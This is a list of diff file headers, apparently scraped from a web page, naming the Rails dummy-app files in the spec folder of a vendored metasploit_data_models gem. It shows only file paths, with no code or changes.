--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/Rakefile
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/Rakefile
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/assets/javascripts/application.js
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/assets/javascripts/application.js
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/assets/stylesheets/application.css
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/assets/stylesheets/application.css
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/controllers/application_controller.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/controllers/application_controller.rb
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/helpers/application_helper.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/helpers/application_helper.rb
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/mailers/.gitkeep
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/mailers/.gitkeep
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/models/.gitkeep
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/models/.gitkeep
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/views/layouts/application.html.erb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/views/layouts/application.html.erb
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config.ru
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config.ru
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/application.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/application.rb
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/boot.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/boot.rb
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/database.yml.example
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/database.yml.example
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/environment.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/environment.rb
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/environments/development.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/environments/development.rb
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/environments/production.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/environments/production.rb
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/environments/test.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/environments/test.rb
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/backtrace_silencers.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/backtrace_silencers.rb
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/inflections.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/inflections.rb
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/mime_types.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/mime_types.rb
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/secret_token.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/secret_token.rb
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/session_store.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/session_store.rb
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/wrap_parameters.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/wrap_parameters.rb
--- a/Show More
+++ b/Show More